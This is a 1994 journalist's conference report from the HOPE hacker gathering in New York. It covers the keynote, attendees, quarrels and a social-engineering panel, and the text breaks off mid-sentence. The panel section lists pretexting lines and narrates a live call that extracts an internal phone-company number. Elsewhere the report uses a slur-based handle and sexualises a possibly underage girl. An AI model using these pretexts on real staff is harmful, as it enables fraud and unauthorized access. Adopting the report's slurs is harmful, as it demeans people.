"Are you waiting for the four?" "Can I slip ahead?" "Are you in 
a death defying hurry?" "I’ll give you a dime for your spot in
line." "You are so pretty for 76, ma’am. Can I sneak ahead?" 

Tears work. Two excruciating minutes to go. I bounced ahead of
everyone in a line the length of the Great Wall of China, got my
tickets and tore ass through Union Station. The closing gate
missed me but caught the suitcase costing me yet more time as I
attempted to disgorge my now-shattered valise from the fork-lift-like
spikes which protect the trains from late-coming commuters.
The rubber edged doors on the train itself were kinder and gentler,
but at this point, screw it. It was Evian and Fritos for
the next three hours.


* * * * *


Promises tend to be lies. The check is in the mail; Dan Quayle 
will learn to spell; I won’t raise taxes. I wonder about HOPE. 


"It’s going to be Bust Central," said one prominent hacker who 
threatened me with electronic assassination if I used his name.


"Emmanuel will kill me." Apparently the authorities-who-be are
going to be there in force. "They want to see if Corrupt or any
of the MoD crew stay after dark, then Zap! Back to jail. (giggle,
giggle.) I want to see that."


Will Mitnick show up? I’d like to talk to that boy. A thousand 
hackers in one place and Eric/Emmanuel egging on the Feds to do 
something stupid. Agent Steal will be there, or registered at 
least, and half of the folks I know going are using aliases.


"I'd like a room please."
"Yessir. Name?"
"Monkey Meat."


"Is that your first or last name?"
"First."

"Last name?" 

"Dilithium Crystal." 

"Could you spell that?" 

Now: I know the Hotel Pennsylvania. It used to be the high 
class Statler Hilton until Mr. Hilton himself decided that the 
place was beyond hope. "Sell it or scuttle it." They sold and 
thus begat the hotel Filthadelphia. I stayed here once in 1989 
and it was a cesspool then. I wondered why the Farsi-fluent 
bellhop wouldn’t tell me how bad the damage was from the fire 
bombed 12th floor. The carpets were the same dingy, once upon a 
time colorful, drab as I remembered. And, I always have a bit of 
trouble with a hotel who puts a security check by the elevator 
bank. Gives you the warm and fuzzies that make you want to come
back right away.

I saved $2 because none of the bell hops noticed I needed help,
but then again, it wouldn’t have mattered for there was no way he
and I and my luggage were going to fit inside of what the hotel
euphemistically refers to as a ’room’. Closet would be kind but
still inaccurate. I think the word, ah, ’$95 a night slum’ might
still be overly generous. Let’s try . . . ah ha! the room that
almost survived the fire bombing. Yeah, that’s the ticket.

The walls were peeling. Long strips of yellowed antique wallpaper
embellished the flatness of the walls as they curled towards
the floor and windows. The chunks of dried glue decorated
the pastel gray with texture and the water stains from I know not
where slithered their way to the soggy carpet in fractal patterned
rivulets. I stood in awe at early funk motif that the
Hotel Filthadelphia chose in honor of my attendance at HOPE.


But, no matter how bad my room was, at least it was bachelor
clean. (Ask your significant other what that means. . .)

In one hacker’s room no bigger than mine I counted 13 sleeping
bags lying amongst the growing mold at the intersection of the
drenched wallboard and putrefying carpet shreds. (God, I love
going to hacker conferences! It’s not that I like Hyatt’s and
Hilton’s all that much: I do prefer the smaller facilities, but, I
am sad to admit, clean counts at my age.) My nose did not have
to venture towards the floor to be aware that the Hotel Filthadelphia
was engaging in top secret exobiological government
experiments bent on determining their communicability and infection
factor.

The top floor of the Hotel Filthadelphia - the 18th - was the
place for HOPE, except the elevator door wouldn’t open. The
inner door did, but even with the combined strength of my personal
crowbar (a New York defensive measure only; I never use it at
home) and three roughians with a bad case of Mexican Claustrophobia,
we never got the door open.


The guard in the lobby was a big help. 


"Try again."

Damned if he didn’t know his elevators and I emerged into the
pre-HOPE chaos of preparing for a conference.


About 100 hackers lounged around in varying forms of disarray -
Hey Rop!


Rop Gongrijp, editor of the Dutch Hacktic, is both a friend and
an occasional source of stimulating argument. Smart as a whip, I
don’t always agree with him, though, the above-ground security
types ought to talk to him for a clear, concise and coherent
description of the whys and wherefores of hacking.


Hey Emmanuel! Hey Strat! Hey Garbage Heap! Hey Erikb! Hey to 
lots of folks. Is that you Supernigger? And Julio? I was surprised.
I knew a lot more of these guys than I thought I did.
Some indicted, some unindicted, some mere sympathizers and other 
techno-freaks who enjoy a weekend with other techno-freaks. 
Security dudes - get hip! Contact your local hacker and make 
friends. You’ll be glad you did.

From behind - got me. My adrenaline went into super-saturated
mode as I was grabbed. I turned and it was . . . Ben. Ben is a
hugger. "I just wanted to hug you," he said sweetly but without 
the humorous sexually deviant connotation that occurred during 
Novocain’s offer to let Phil Zimmerman sleep with him in Las 
Vegas. 


I smiled a crooked smile. "Yeah, right." Woodstock ’94 was a 
mere 120 miles away . . .maybe there was a psychic connection. 
But Ben was being sincere. He was hugging everyone. Everyone. 
At 17, he really believes that hugging and hacking are next to 
Godliness. Boy does he have a surprise coming the first time his
mortgage is late. Keep hugging while you have the chance, Ben. 


Assorted cases of Zima (the disgusting Polish is-this-really-lime
flavored beer of choice by those without taste buds) appeared,
but anyone over the age of 21 drank Bud. What about the 12 year 
olds drinking? And the 18 year olds? And the 16 year olds? 


"Rop, I don’t think you need to give the hotel an excuse to bust 
you guys outta here." Me, fatherly and responsible? Stranger 
things have happened. The beer was gone. I’m not a teetotaler, 
but I didn’t want my weekend going up in flames because of some 
trashed 16 year old puking on an Irani ambassador in the lobby. 
No reason to test fate. 


* * * * *


Nothing worked, but that’s normal. 


Rop had set up HEU (Hacking at the End of the Universe) in
Holland last year with a single length of 800m ethernet. (That’s
meter for the Americans: about 2625 ft.) HOPE, though was different.
The Hotel Filthadelphia’s switchboard and phone systems
crashed every half hour or so which doesn’t do a lot for the
health of 28.8 slip lines.


The object of the exercise was seemingly simple: plug together 
about 20 terminals into a terminal server connected to Hope.Com 
and let ’em go at it. Provide ’net access and, to the lucky
winner of the crack-the-hopenet server (root) the keys to a 1994 
Corvette! 


You heard it right! For breaking into root of their allegedly 
secure server, the folks at 2600 are giving away keys to a 1994
Corvette. They don’t know where the car is, just the keys. But 
they will give you the car’s last known location . . . or was it 
$50 in cash? 


Erikb - Chris Goggans - showed up late Friday night in disguise:
a baseball cap over his nearly waist length dirty blond hair. 


"He’s here!" one could hear being muttered. "He had the balls to 
show up!" "He’s gonna get his ass kicked to a pulp." "So you 
did come . . . I was afraid they’d intimidated you to stay in
Texas."

No way! "Why tell the enemy what your plans are." Even the 50’s-
something ex-amphetamine-dealer turned reseller of public-records
Bootleg didn’t know Goggans was going to be there. But the
multiple fans of Erikb, (a strong resemblance to Cyber Christ if
he do say so himself) were a-mighty proud to see him.


This stunning Asian girl with skin too soft to touch (maybe she 
was 14, maybe she was 25) looked at Erikb by the message board. 
"You're," she pointed in disbelief "Erikb?" Chris nods, getting 
arrogantly used to the respectful adulation. Yeah, that’s me, to 
which the lady/girl/woman instantly replied, "You’re such an 
asshole." Smile, wide smile, hug, kiss, big kiss. Erikb revels 
in the attention and hundreds of horny hackers jealously look on. 


Friday night was more of an experience - a Baba Ram Dass-like Be
Here Now experience with mellow being the operative word. The
hotel had apparently sacrificed 20,000 square feet of its penthouse
to hackers, but it was obvious to see they really didn’t
give a damn if the whole floor got trashed. Ceiling panels
dripped from their 12 foot lofts making a scorched Shuttle underbelly
look pristine. What a cesspool! I swear nothing had been
done to the decorative environs since the day Kennedy was shot.
But kudos to Emmanuel for finding a centrally located cesspool 
that undoubtedly gave him one hell of a deal. I think it would be 
a big mistake to hold a hacker conference at the Plaza or some 
such snooty overly-self-indulgent denizen of the rich. 


Filth sort of lends credibility to an event that otherwise seeks 
notoriety. 


I didn’t want to take up too much of Emmanuel’s and Rop’s time - 
they were in setup panic - so it was off to the netherworld until 
noon. That’s when a civilized Con begins. 


* * * * *


I dared to go outside; it was about 11AM and I was in search of 
the perfect New York breakfast: a greasy spoon that serves coffee 
as tough as tree bark and a catatonia inducing egg and bacon
sandwich. Munch, munch, munch on that coffee. 


I’d forgotten how many beggars hang out on the corner of 33rd and 
7th, all armed with the same words, "how about a handout, Winn?" 
How the hell do they know my name? "Whatever you give will come 
back to you double and triple . . . please man, I gotta eat." It 
is sad, but John Paul Getty I ain’t. 


As I munched on my coffee and sipped my runny egg-sandwich I 
noticed that right in front of the runny-egg-sandwich place sat a 
Ford Econoline van. Nice van. Nice phone company van. What are
they doing here? Oh, yeah, the hackers need lines and the switchboard
is down. Of course, the phone company is here. But,
what’s that? Hello? A Hacker playing in the phone van? I recognize
you! You work with Emmanuel. How? He’s robbing it. Not
robbing, maybe borrowing.


The ersatz telephone van could have fooled anyone - even me, a 
color blind quasi-techno-weanie to yell "Yo! Ma Bell!" But, upon 
not-too-closer inspection, the TPC (The Phone Company) van was in 
fact a 2600 van - straight from the minds of Emmanuel and 
friends. Impeccable! The telephone bell in a circle logo is, in 
this case, connected via cable to a hacker at a keyboard. The
commercial plates add an additional air of respectability to the
whole image. It works.


* * * * *


Up to HOPE - egg sandwich and all.

The keynote speech was to be provided courtesy of the Man in
Blue. Scheduled for noon, things were getting off to a late 
start. The media (who were there in droves, eat your heart out 
CSI) converged on the MIB to see who and why someone of his 
stature would (gasp!) appear/speak at a funky-downtown hotel 
filled with the scourges of Cyberspace. I didn’t see if Ben 
hugged the MIB, but I would understand if he didn’t. Few people 
knew him or suspected what size of Jim-Carey-MASK arsenal might 
suddenly appear if a passive hug were accidentally interpreted as 
being too aggressive. The MIB is imposing and Ben too shy. 


The media can ask some dumb questions and write some dumb articles
because they spend 12 1/2 minutes trying to understand an
entire culture. Can’t do that fellows! 


The MIB, though, knows hackers and is learning about them more 
and more; and since he is respectable, the media asks him about 
hackers. What are hackers? Why are YOU here, Mr. MIB? 


"Because they have a lot to offer. They are the future," the Man 
In Blue said over and over. Interview after interview how time 
flies when you’re having fun - and the lights and cameras are 
rolling from NBC and PIX and CNN and assorted other channels and 
magazines. At 12:55 chaos had not settled down to regimented 
disorganization and the MIB was getting antsy. After all, he was 
a military man and 55 minutes off schedule: Egad! Take charge. 


The MIB stood on a chair and hollered to the 700+ hacker phreaks 
in the demonstration ballroom, "Hey! It’s starting. Let’s go the
theater and get rocking! Follow me." He leaned over to me: "Do 
you know where the room is?" 


"Sure, follow me." 


"Everyone follow, c’mon," yelled the MIB. "I’m going to get 
started in exactly three minutes," and three minutes he meant. 
Despite the fact that I got lost in a hallway and had hundreds of 
followers following my missteps and the MIB yelling at me for
getting lost in a room with only two doors, we did make the main 
hall, and within 90 seconds he took over the podium and began 
speaking. 


"I bet you’ve always wanted to ask a spy a few questions. Here’s 
your chance. But let me say that the United States intelligence 
community needs help and you guys are part of the solution." The 
MIB was impeccably dressed in his pin stripe with only traces of
a Hackers 80 T-shirt leaking through his starched white dress
shirt. The MIB is no less than Robert Steele, ex-CIA type spy,
senior civilian in Marine Corps Intelligence and now the President
of Open Source Solutions, Inc.


He got these guys (and gals) going. Robert doesn’t mince words 
and that’s why as he puts it, he’s "been adopted by the hackers." 
At his OSS conferences he has successfully juxtaposed hackers and 
senior KGB officials who needed full time security during their 
specially arranged 48 hour visa to Washington, DC. He brought 
Emmanuel and Rop and clan to his show and since their agendas 
aren’t all that different, a camaraderie was formed. 


Robert MIB Steele believes that the current intelligence machinery
is inadequate to meet the challenges of today’s world. Over
80% of the classified information contained with the Byzantine
bowels of the government is actually available from open sources.
We need to realize that the future is more of an open book than
ever before.


We classify newspaper articles from Peru in the incredibly naive
belief that only Pentagon spooks subscribe. We classify BBC
video tapes from the UK with the inane belief that no one will
watch it if it so stamped. We classify $4 Billion National
Reconnaissance Office satellite generated street maps of Calle,
Colombia when anyone with an IQ only slightly above a rock can
get the same one from the tourist office. And that’s where
hackers come in.

"You guys are a national resource. Too bad everyone’s so scared
of you." Applause from everywhere. The MIB knows how to massage
a crowd. Hackers, according to Steele, and to a certain extent I
agree, are the truth tellers "in a constellation of complex
systems run amok and on the verge of catastrophic collapse." 


Hackers are the greatest sources of open source information in 
the world. They have the navigation skills, they have the time,
and they have the motivation, Robert says. Hackers peruse the
edges of technology and there is little that will stop them in
their efforts. The intelligence community should take advantage
of the skills and lessons that the hackers have to teach us, yet
as we all know, political and social oppositions keep both sides
(who are really more similar than dissimilar) from talking.

"Hackers put a mirror up to the technical designers who have
built the networks, and what they see, they don’t like. Hackers
have shown us all the chinks in the armor of a house without
doors or windows. The information infrastructure is fragile and
we had better do something about it now; before it’s too late."


Beat them at their own game, suggests Steele. Keep the doors of 
Cyberspace open, and sooner or later, the denizens of the black 
holes of information will have to sooner or later realize that the
cat is out of the bag. 


Steele educated the Hacker crowd in a way new to them: he treated
them with respect, and in turn he opened a channel of dialog
that few above ground suit-types have ever envisioned. Steele
works at the source. 


HOPE had begun and Robert had set the tone. 


* * * * *


The day was long. Dogged by press, hackers rolled over so the 
reporters could tickle their stomachs on camera. Despite their 
public allegations that the media screws it up and never can get 
the story right, a camera is like a magnet. The New York Times 
printed an article about HOPE so off the wall I wondered if the 
reporter had actually been there. Nonetheless, the crowds followed
the cameras, the cameras followed the crowds, and the
crowds parted like the Red Sea. But these were mighty colorful 
crowds. 


We all hear of that prototypical image of the acne faced, Jolt- 
drinking, pepperoni downing nerdish teenager who has himself 
locked in the un-air-conditioned attic of his parents’ half 
million dollar house from the time school gets out till the sun 
rises. Wrongo security-breath. Yeah, there’s that component, but
I was reminded of the ’80’s, the early ’80’s by a large percentage
of the crowd.


Purple hair was present but scarce, and I swear on a stack of
2600’s that Pat from Saturday Night Live was there putting everyone’s
hormonal guess-machines to the test. But what cannot help
but capture one’s attention is a 40 pin integrated circuit inserted
into the shaved side skull of an otherwise clean-cut
Mohawk haircut.

The story goes that Chip Head went to a doctor and had a pair of
small incisions placed in his skull which would hold the leads
from the chip. A little dab of glue and in a few days the skin 
would grow back to hold the 40 pins in the natural way; God’s 
way. 


There was a time that I thought ponytails were ‘out’ and passe, 
but I thought wrong. Mine got chopped off in roughly 1976 down 
to shoulder length which remained for another six years, but half 
of the HOPE audience is the reason for wide spread poverty in the 
hair salon industry. 


Nothing wrong with long, styled, inventive, outrageous hair as 
long as it’s clean; and with barely an exception, such was the 
case. In New York it’s not too hard to be perceived as clean, 
especially when you consider the frame of reference. Nothing is 
too weird. 


The energy level of HOPE was much higher than the almost lethargic
(but good!) DefCon II. People move in a great hurry, perhaps
to convey the sense of importance to others, or just out of
frenetic hyperactivity. Hackers hunched over their keyboards -
yet with a sense of urgency and purpose. Quiet yet highly animated
conversations in all corners. HOPE staff endlessly pacing
throughout the event with their walkie-talkies glued to their 
ears. 


Not many suit types. A handful at best, and what about the Feds? 
I was accosted a few times for being a Fed, but word spread: no 
Fed, no bust. Where were the Feds? In the lobby. The typical 
NYPD cop has the distinctive reputation of being overweight 
especially when he’s wearing two holsters - one for the gun and one
for the Italian sausage. Perpetually portrayed as donut dunking 
dodo’s, some New York cops’ asses are referred to as the Fourth 
Precinct and a few actually moonlight as sofas. 


So rather than make a stink, (NY cops hate to make a scene) the
lobby of the Hotel Filthadelphia was home to the Coffee Clutch
for Cops. About a half dozen of them made their profound
presence known by merely spending their day consuming mass quantities
of questionable ingestibles, but that was infinitely
preferable to hanging out on the 18th floor. The hackers weren’t 
causing any trouble, the cops knew that, so why push it. Hackers 
don’t fight, they hack. Right? 


After hours of running hours behind schedule, the HOPE conference 
was in first place for disorganized, with DefCon II not far 
behind. Only with 1000 people to keep happy and in the right
rooms, chaos reigns sooner. The free Unix sessions and Pager 
session and open microphone bitch session and the unadulterated 
true history of 2600 kept audiences of several hundred hankering 
for more - hour after hour. 


Over by the cellular hacking demonstrations, I ran into a hacker 
I had written about: Julio, from the almost defunct Masters of 
Destruction. Julio had gone state’s evidence and was prepared to 
testify against MoD ring leader Mark Abene (aka Phiber Optik) but 
once Mark pled guilty to enough crimes to satisfy the Feds, Julio 
was off the hook with mere probation. Good guy, sworn off of 
hacking. Cell phones are so much more interesting. 


However, while standing around with Erikb and a gaggle of Cyber 
Christ wanna-bes, Julio and his friend (who was the size of Texas 
on two legs) began a pushing match with Goggans. "You fucking 
narc red-neck son of a bitch." Goggans helped build the case 
against the MoD and didn’t make a lot of friends in the process. 


The shoving and shouldering reminded me of slam dancing from
decades past, but these kids are too young to have taken part in
the social niceties of deranged high speed propulsion and revulsion
on the dance floor. So it was a straight out pushing match,
which found Erikb doing his bloody best to avoid. Julio and pal
kept a’coming and Erikb kept avoiding. It took a dozen of us to
get in the middle and see that Julio was escorted to the elevators.


Julio said Corrupt, also of the MoD, was coming down to HOPE, 
too. Corrupt has been accused of mugging drug dealers to finance 
his computer escapades, and was busted along with the rest of the 
MoD gang. The implied threat was taken seriously, but, for 
whatever reason, Corrupt never showed. It is said that the 
majority of the hacking community distances itself from him; he’s 
not good for the collective reputation. So much for hacker 
fights. All is calm. 


The evening sessions continued and continued with estimates of as
late as 4AM being bandied about. Somewhere around 1:00AM I ran
into Bootleg in the downstairs bar. Where was everybody? Not 
upstairs. Not in the bar. I saw a Garbage Heap in the street 
outside (now that’s a double entendre) and then Goggans popped up 
from the door of the Blarney Stone, a syndicated chain of low- 
class Irish bars that serve fabulously thick hot sandwiches. 


"We’re about to get thrown out." 


"From the Blarney Stone? That’s impossible. Drunks call the 
phone booths home!" 


Fifty or so hacker/phreaks had migrated to the least likely, most 
anachronistic location one could imagine. A handful of drunken 
sots leaning over their beers on a stain encrusted wooden breeding
ground for salmonella. A men’s room that hasn’t seen the
fuzzy end of a brush for the best part of a century made Turkish 
toilets appear refreshingly clean. And they serve food here. 


I didn’t look like a hacker so I asked the bartender, "Big crowd, 
eh?" 


The barrel chested beer bellied barman nonchalantly replied, 
"nah. Pretty usual." He cleaned a glass so thoroughly the water 
marks stood out plainly. 


"Really? This much action on a Saturday night on a dark side 
street so questionably safe that Manhattan’s Mugger Society posts 
warnings?" 

"Yup."

"So," I continued. "These hackers come here a lot?" 


"Sure do," he said emphatically. 


"Wow. I didn’t know that. So this is sort of a hacker bar, you 
might say?"

"Exactly. Every Saturday night they come in and raise a little
hell."


With a straight face I somehow managed to thank the confused 
barman for his help and for the next four hours learned that 
socially, hackers of today are no different than many if not most 
of us were in our late teens and early twenties. We laughed and
joked and so do they - but there is more computer talk. We
decried the political status of our day as they do theirs, albeit
they with less fervor and more resignation. The X-Generation
factor: most of them give little more than a tiny shit about
things they view as being totally outside their control, so why
bother. Live for today. 


Know thy enemy. Robert hung in with me intermingling and arguing
and debating and learning from them, and they from us.
Hackers aren’t the enemy - their knowledge is - and they are not
the exclusive holders of that information. Information Warfare
is about capabilities, and no matter who possesses that capability,
there ought to be a corresponding amount of respect.


Indeed, rather than adversaries, hackers could well become government
allies and national security assets in an intense international
cyber-conflict. In the LoD/MoD War of 1990-91, one
group of hackers did help authorities. Today many hackers assist 
professional organizations, governments in the US and overseas - 
although very quietly. 'Can’t be seen consorting with the 
enemy.’ Is hacking from an Army or Navy or NATO base illegal? 
Damned if I know, but more than one Cyber Christ-like character 
makes a tidy sum providing hands-on hacking education to the 
brass in Europe. 


Where these guys went after 5AM I don’t know, but I was one of 
the first to be back at the HOPE conference later that day; 12:30 
PM Sunday. 


* * * * *


The Nazi Hunters were out in force. 


"The Neo-Nazi skinheads are trying to start another Holocaust." A 
piercing, almost annoying voice stabbed right through the crowds. 
"Their racist propaganda advocates killing Jews and blacks. They 
have to be stopped, now." 


Mortechai Levy (I’ll call him Morty) commanded the attention of a
couple dozen hackers. Morty was a good, emotional, riveting
shouter. "These cowardly bastards have set up vicious hate call
lines in over 50 cities. The messages advocate burning synagogues,
killing minorities and other violence. These phones have
to be stopped!"


The ever-present leaflet from Morty’s Jewish Defense Organization
asked for help from the 2600 population.

"Phone freaks you must use your various assorted bag of
tricks to shut these lines down. No cowardly sputterings
about ’free speech’ for these fascist scum."


The headline invited the hacker/phreak community to: 


"Let’s Shut Down ’Dial-A-Nazi’!!!" 


Morty was looking for political and technical support from a band 
of nowhere men and women who largely don’t know where they’re 
going much less care about an organized political response to 
someone else’s cause. He wasn’t making a lot of headway, and he
must have known that he would walk right into the anarchist’s
bible: the 1st amendment.


The battle lines had been set. Morty wanted to see the Nazis 
censored and hackers are absolute freedom of speechers by any 
measure. Even Ben sauntering over for a group hug did little to 
defuse the mounting tension. 


I couldn’t help but play mediator. Morty was belligerently loud 
and being deafeningly intrusive which affected the on-going sessions.
To tone it down some, we nudged Morty and company off to
the side and occupied a corner of thread bare carpet, leaning
against a boorish beige wall that had lost its better epidermis.


The heated freedom of speech versus the promotion of racial
genocide rancor subdued little even though we were all buns side
down. I tried to get a little control of the situation. 


"Morty. Answer me this so we know where you’re coming from. You 
advocate the silencing of the Nazis, right?"

"They’re planning a new race war; they have to be stopped."

"So you want them silenced. You say their phones should be
stopped and that the hackers should help."

"Call that number and they’ll tell you that Jews and blacks
should be killed and then they..."

"Morty. OK, you want to censor the Nazis. Yes or No."

"Yes."

"OK, I can understand that. The question really is, and I need
your help here, what is the line of censorship that you advocate.
Where is your line of legal versus censored?"


A few more minutes of political diatribe and then he got to the 
point. "Any group with a history of violence should be censored 
and stopped." A little imagination and suddenly the whole planet 
is silenced. We need a better line, please. "Hate group, Nazis, 
people who advocate genocide . . . they should be
silenced. . . ."

"So," I analyzed. "You want to establish censorship criteria 
based upon subjective interpretation. Whose interpretation?" 


My approach brought nods of approval. 


One has to admire Morty and his sheer audacity and tenacity and
how much he strenuously and single-mindedly drives his points
home. He didn’t have the ideal sympathetic audience, but he
wouldn’t give an inch. Not an inch. A little self righteousness
goes a long way; boisterous extremism grows stale. It invites
punitive retorts and teasing, or in counter-culture jargon,
"fucking with their heads."


Morty (perhaps for justifiable reasons) was totally inflexible
and thus more prone to verbal barbing. "You’re just a Jewish
racist. Racism in reverse," accused one jocular but definitely
lower middle class hacker with an accent thicker than all of
Brooklyn.


Incoming Scuds! Look out! Morty went nuts and as they say,
freedom of speech ends when my fist impacts upon your nose.
Morty came dangerously close to crossing that line. Whoah,
Morty, whoah. He’s just fucking with your head. The calm-down
brigade did its level best to keep these two mortals at opposite
ends of the room.

"You support that Neo Nazi down there; you’re as bad as the
rest!" Morty said. "See what I have to tolerate. I know him,
we’ve been keeping track of him and he hangs out with the son of
the Grand Wizard of Nazi Oz." The paranoid train got on the
tracks.


"Do you really know the Big Poo-bah of Hate?" I asked the hacker 
under assault and now under protective custody.

"Yeah," he said candidly. "He’s some dick head who hates everyone.
Real jerk."

"So what about what you said to Morty over there?"


"Just fucking with his head. He gets a little extreme." So we 
had in our midst the Al Sharpton of the Jewish faith. Ballsy. 
Since Morty takes Saturdays off by religious law, he missed the
press cavalcade, but as a radical New York fixture, the media 
probably didn’t mind too much. 


I was off to sessions, Morty found new audiences as they came off 
the elevators, and the band played on. 


* * * * *


In my humble 40-something opinion, the best session of HOPE
was the one on social engineering.


The panel consisted of only Emmanuel, Supernigger (social engineer
par excellence) and Cheshire Catalyst. The first bits were
pretty staid dry conventional conference (ConCon) oriented, but
nonetheless, not the kind of info that you expect to find William
H. Murray, Executive Consultant handing out.


The best social engineers make friends of their victims. Remember:
you’re playing a role. Think Remington Steele.

Schmooze! "Hey, Jack did you get a load of the blond on Stern
last night?"

Justifiable anger: "Your department has caused nothing but headaches.
These damn new computers/phones/technology just don’t
work like the old ones. Now either you help me now or I’m going
all the way to Shellhorn and we’ll see what he says about these kinds
of screwups." A contrite response is the desired effect.

Butt headed bosses: "Hey, my boss is all over my butt, can you
help me out?"

Management hatred: "I’m sitting here at 3PM working while management
is on their yachts. Can you tell me . . . ?"

Giveaways: "Did you know that so and so is having an affair with
so and so? It’s true, I swear. By the way, can you tell me how
to . . . ?"

Empathy: "I’m new, haven’t been to the training course and they
expect me to figure this out all by myself. It’s not fair."

Thick Accent: "Hi. Dees computes haf big no wurk. Eet no makedah
passurt. Cunu help? Ah, tanku." Good for a quick exchange and a
quick good-bye. Carefully done, people want you off the phone
quickly.


Billsf, the almost 40 American phreak who now calls Amsterdam 
home was wiring up Supernigger’s real live demonstration of 
social engineering against Sprint. A dial tone came over the PA
system followed by the pulses to 411. 


"Directory Assistance," the operator’s male voice was squeezed 
into a mere three kilohertz bandwidth. 


Suddenly, to the immense pleasure of the audience, an ear-splitting
screech a thousand times louder than finger nails on a chalk
board not only belched across the sound system but caused instant 
bleeding in the ears of the innocent but now deaf operator. 
Billsf sheepishly grinned. "Just trying to wire up a mute 
button."

Three hundred people in unison responded: "It doesn’t work." No
Shit!


While Billsf feverishly worked to regain his reputation, Supernigger
explained what he was going to do. The phone companies
have a service, ostensibly for internal use, called a C/NA. Sort
of a reverse directory when you have the number but want to know
who the number belongs to and from whence it comes. You can 
understand that this is not the sort of feature that the phone 
company wants to have in the hands of a generation of kids who 
are so apathetic that they don’t even know they don’t give a 
shit. Nonetheless, the access to this capability is through an 
800 number and a PIN. 


Supernigger was going to show us how to acquire such privileged
information. Live. "When you get some phone company person as
dumb as a bolt on the other end, and you know a few buzz words,
you convince them that it is in their best interest and that they
are supposed to give you the information."


"I’ve never done this in front of an audience before, so give me
three tries," he explained to an anxiously foaming at the mouth
crowd. No one took a cheap pot shot at him: tacit acceptance of
his rules.


Ring. Ring. 
"Operations. Mary." 


"Mary. Hi, this is Don Brewer in social engineering over at CIS, 
how’s it going?" Defuse. 


"Oh, fine. I guess." 


"I know, I hate working Sundays. Been busy?" 
"Nah, no more. Pretty calm. How can I help you?" 
"I’m doing a verification and I got systems down. I just need
the C/NA. You got it handy?" Long pause.


"Sure, lemme look. Ah, it’s 313.424.0900." 700 notebooks appeared
out of nowhere, accompanied by the sound of 700 pens
writing down a now-public phone number.


"Got it. Thanks." The audience is gasping at the stunningly 
stupid gullibility of Mary. But quiet was essential to the 
mission. 


"Here’s the PIN number while we’re at it." Double gasp. She’s 
offering the supposedly super secret and secure PIN number? Was 
this event legal? Had Supernigger gone over the line? 


"No, CIS just came up. Thanks anyway." 
"Sure you don’t need it?" 


"Yeah. Thanks. Bye." Click. No need to press the issue. PIN 
access might be worth a close look from the next computer DA 
wanna-be. 


An instant shock wave of cacophonous approval worked its way
throughout the 750 seat ballroom in less than 2 microseconds.
Supernigger had just successfully set himself as a publicly
ordained Cyber Christ of Social Engineering. His white robes
were on the way. Almost a standing ovation lasted for the better
part of a minute by everyone but the narcs in the audience. I
don’t know if they were telco or Feds or whatever, but I do know
that they were the stupidest narcs in the city of New York. This
pair of dour thirty something Republicans had sphincters so tight
you could mine diamonds out of their ass.


Arms defiantly and defensively crossed, they were stupid enough 
to sit in the third row center aisle. They never cracked a smile 
at some of the most entertaining performances I have seen outside 
of the giant sucking sound that emanates from Ross Perot’s ears. 


Agree or disagree with hacking and phreaking, this was funny and
unrehearsed ad lib material. Fools. So, for fun, I crawled over
the legs of the front row and sat in the aisle, a bare eight feet
from the narcs. Camera in hand I extended the 3000mm tele-photo
lens which can distinguish the color of a mosquito’s underwear
from a kilometer and pointed it in their exact direction. Their
childhood acne scars appeared the depth of the Mariana Trench.
Click, and the flash went off into their eyes, which at such a
short distance should have caused instant blindness. But nothing.
No reaction. Nada. Cold as ice. Rather disappointing, but
now we know that almost human looking narc-bots have been perfected
and are being beta tested at hacker cons.


Emmanuel Goldstein is very funny. Maybe that’s why Ed Markey and
he get along so well. His low key voice rings of a gentler,
kinder sarcasm but has a youthful charm despite that he is
30-something himself.


"Sometimes you have to call back. Sometimes you have to call
over and over to get what you want. You have to keep in mind
that the people at the other end of the phone are generally not
as intelligent as a powered down computer." He proceeded to
prove the point.


Ring ring,

"Directory Assistance."

"Hi."

"Hi."

"Hi."

"Can I help you."

"Yes."

Pause.

"Hello?"

"Hi."

"Hi."

"Can I help you."

"OK."

Shhhhh. Ssshhh. Quiet. Shhhh. Too damned funny for words.
"Directory Assistance." 

"I need some information." 
"How can I help you." 


"Is this where I get numbers?" 
"What number would you like?"

"Information."

"This is information."

"You said directory assistance."

"This is."

"But I need information." 

"What information do you need?" 
"For information." 

"This is information." 

"What’s the number?" 

"For what?" 

"Information." 


"This is directory assistance." 


"I need the number for information."
Pause. Pause. 
"What number do you want?" 


"For information." 


Pause. Guffaws, some stifled, some less so. 


"Hold on please." 

Pause. 

"Supervisor. May I help you?"

"Hi."

"Hi."

Pause. 

"Can I help you?" 


"I need the number for information."


"This is directory assistance." 

"Hi."

"Hi."

"What’s the number for information?" 
"This is information." 


"What about directory assistance?" 


"This is directory assistance." 


"But I need information." 


Funny stuff.

"This is information."

"Oh, OK. What’s the number for information?" 
Pause. 

"Ah 411." 

"That’s it?" 

"No. 555.1212 works too." 

"So there’s two numbers for information?" 
"Yes."


"Which one is better?" How this audience kept its cool was
beyond me. Me and my compatriots were beside ourselves.


Pause. 

"Neither." 

"Then why are there two?" 

Pause. 

"I don’t know."

"OK. So I can use 411 or 555.1212." 
"That’s right." 

"And which one should I use?" 

Pause. 

"411 is faster." Huge guffaws. Ssshhhh. Ssshhhh.. 
"Oh. What about the ones?" 

"Ones?" 

"The ones." 

"Which ones?" 


"The ones at the front of the number." 


"Oh, those ones. You don’t need ones. Just 411 or 555.1212..."


"My friends say they get to use ones." Big laugh. Shhhhhh. 


"That’s only for long distance." 


"To where?" How does he keep a straight face? 
Pause. 

"If you wanted 914 information you’d use a one." 
"If I wanted to go where?"

"To 914?" 


"Where’s that?" 


"Westchester."

"Oh, Westchester. I have friends there." 
Pause. 

"Hello?" 

"Yes?" 

"So I use ones?" 

"Yes. A one for the 914 area." 

"How?" 


Pause. 


"Put a one before the number." 
"Like 1914. Right?" 
"1.914.555.1212."

"All of those numbers?" 


"Yes." 


"That’s three ones."

"That’s the area code."

"I’ve heard about those. They confuse me." Rumbling chuckles
and laughs throughout the hall.

Pause.

She slowly and carefully explained what an area code is to the
howlingly irreverent amusement of the entire crowd except for the
fool narcs.

"Thanks. So I can call information and get a number?"

"That’s right."

"And there’s two numbers I can use?"

"Yes."

"So I got two numbers on one call?"

"Yes..."

"Wow. Thanks. Have a nice day."


* * * * *


Comments heard around HOPE.


Rop Gonggrijp, Hacktic: "The local phone companies use their own
social engineers when they can’t get their own people to tell
them what they need to know."


Sprint is using what they consider to be the access
mechanism since the guillotine. For all of us road warriors out
there who are forever needing long distance voice service from
the Whattownisthis, USA airport, Sprint thinks they have a better
mousetrap. No more messing finger entry. No more pass-codes or
I remember at the Washington National Airport last summer I was
